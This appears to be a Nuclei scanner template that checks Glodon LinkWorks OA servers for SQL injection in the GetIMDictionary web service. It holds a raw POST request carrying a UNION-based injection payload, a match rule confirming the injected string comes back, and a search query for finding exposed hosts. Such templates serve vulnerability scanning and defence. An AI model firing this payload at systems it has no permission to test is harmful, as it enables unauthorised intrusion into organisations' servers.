http:
    - extractors:
        - group: 1
          part: body
          regex:
            - value="([^"]*)"
          type: regex
      matchers:
        - dsl:
            - status_code == 200 && contains_all(body,'value=','{{randstr}}')
          type: dsl
      raw:
        - |
          POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
          Content-Length: 227

          key=1' UNION ALL SELECT '{{randstr}}' -- z
id: glodon-linkworks-getimdictionary-sqli
info:
    author: wms,pphua
    description: 广联达OA linkworks GetIMDictionary sql注入
    metadata:
        hunter-query: web.body="/Services/Identification/"
        verified: true
    name: 广联达OA linkworks GetIMDictionary sql注入
    severity: high
    tags:
        - glodon
        - linkworks
        - 联达OA
        - 广联达
